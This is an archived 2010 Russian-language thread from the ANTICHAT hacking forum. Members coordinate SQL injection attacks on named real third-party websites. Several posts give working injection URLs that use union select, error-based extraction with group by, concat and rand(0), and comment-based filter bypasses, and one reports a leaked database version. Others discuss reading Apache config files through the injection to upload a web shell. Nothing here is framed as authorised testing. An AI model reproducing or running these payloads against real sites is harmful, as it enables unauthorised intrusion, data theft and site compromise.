ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.08.2010, 20:10
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Koren
Koren said:
category.php?categoryID=55+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16+--+ указывает на фильтрацию, обхожу фильтр выдаёт цифры для вывода инфы но страница держится не больше 1 секунды, и перекидывает на главгую, возможно что то сделать?
впринцепи решение уже нашёл.. "остановив страницу"))
ну может есть ещё какой способ
т.к не всегда получается успеть нажать на stop
юзай более продвинутые бразуеры, такие как opera.
|
|
|
16.08.2010, 20:16
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
19069
Репутация:
0
|
|
попугай от того что я перешёл на оперу ничего не изменилось(
IMMORTAL_S софт тот что у меня есть фильтр не обходит
|
|
|
|
16.08.2010, 21:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
6976
Репутация:
4
|
|
Сообщение от Koren
Koren said:
category.php?categoryID=55+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16+--+ указывает на фильтрацию, обхожу фильтр выдаёт цифры для вывода инфы но страница держится не больше 1 секунды, и перекидывает на главгую, возможно что то сделать?
впринцепи решение уже нашёл.. "остановив страницу"))
ну может есть ещё какой способ
т.к не всегда получается успеть нажать на stop
Мдауж, отруби редирект + javascript в браузере.
Сообщение от Koren
Koren said:
о чём это говорит? You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union*/ /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- )) ORD' at line 1
недопустимые символы? или же?
как только не пробывал фильтровать
ответ один и тот же.. либы ошибка(фильтр) или вот это сообщение
)) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 --
Сообщение от Byrger
Byrger said:
Вот ссылка, мне не жалко но если кто-то ковырнет раньше меня то поделитесь со всеми
http://www.flashloaded.com/cart/basket.php?action=Add&itemid=6587
Сообщение от None
http://www.flashloaded.com/cart/basket.php?action=Add&itemid=1+or+1+group+by+conca t(version(),rand(0)|0)+having+min(0)+--+
|
|
|
|
16.08.2010, 22:45
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944
Репутация:
37
|
|
Сообщение от Gorev
Gorev said:
если читалка работает то попробуй найти /etc/httpd/conf/httpd.conf
У меня тоже есть сайтиги где можно через скулю залить шелл, но пути незнаю. Прочитал файл /etc/httpd/conf/httpd.conf , но путей не нашел. Или в конфиге апача не всегда путь найти можно? Кто подскажет?
|
|
|
|
16.08.2010, 22:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
6976
Репутация:
4
|
|
Сообщение от ZARO
ZARO said:
У меня тоже есть сайтиги где можно через скулю залить шелл, но пути незнаю. Прочитал файл
/etc/httpd/conf/httpd.conf
, но путей не нашел. Или в конфиге апача не всегда путь найти можно? Кто подскажет?
Покажи сайт в пм.
|
|
|
|
17.08.2010, 02:21
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
19069
Репутация:
0
|
|
Charle не во всех случаях помогает отрубленая джаваскрипт
|
|
|
|
17.08.2010, 12:00
|
|
Новичок
Регистрация: 31.12.2009
Сообщений: 19
Провел на форуме:
60679
Репутация:
10
|
|
Научите плз крутить такие инъекции, когда order by показывает определенное кол-во полей, но union select говорит, что кол-во полей не совпадает.. в общем как бы двойная инъекция должна быть, а вот с синтаксисом у меня траблы...
Код:
Code:
http://www.starallergyalerts.com.au/shop/cart.php?target=product&product_id=16264+union+select+1,2,3,4,5,6--&category_id=259
спасибо! |
|
|
|
17.08.2010, 15:49
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944
Репутация:
37
|
|
Сообщение от sqlinjector
sqlinjector said:
Научите плз крутить такие инъекции, когда order by показывает определенное кол-во полей, но union select говорит, что кол-во полей не совпадает.. в общем как бы двойная инъекция должна быть, а вот с синтаксисом у меня траблы...
Код:
Code:
http://www.starallergyalerts.com.au/shop/cart.php?target=product&product_id=16264+union+select+1,2,3,4,5,6--&category_id=259
спасибо! И какое кол-во полей тебе показывает order by?
З.Ы.
Код:
Code:
http://www.starallergyalerts.com.au/shop/cart.php?target=product&product_id=16264'and+mid(version(),1,1)='4&category_id=259
Код:
Code:
http://www.starallergyalerts.com.au/shop/cart.php?target=product&product_id=16264'or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+version()),1,64),floor(rand(0)*2)))='1&category_id=259
Вывод в ошибке - 4.1.22-log
|
|
|
|
17.08.2010, 15:59
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме:
101927
Репутация:
0
|
|
Есть скуль, фильтрует select или union. Может кто помочь раскрутить ?
Сообщение от None
http://www.music-master.ru/?action=show_list&cat=11069%27+union+select+1/*
|
|
|
|
17.08.2010, 16:10
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944
Репутация:
37
|
|
Сообщение от a1ertso
a1ertso said:
Есть скуль, фильтрует select или union. Может кто помочь раскрутить ?
http://www.music-master.ru/?action=show_list&cat=-11069+'+union+select+concat_ws(0x3a,version(),user (),database())+--+
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
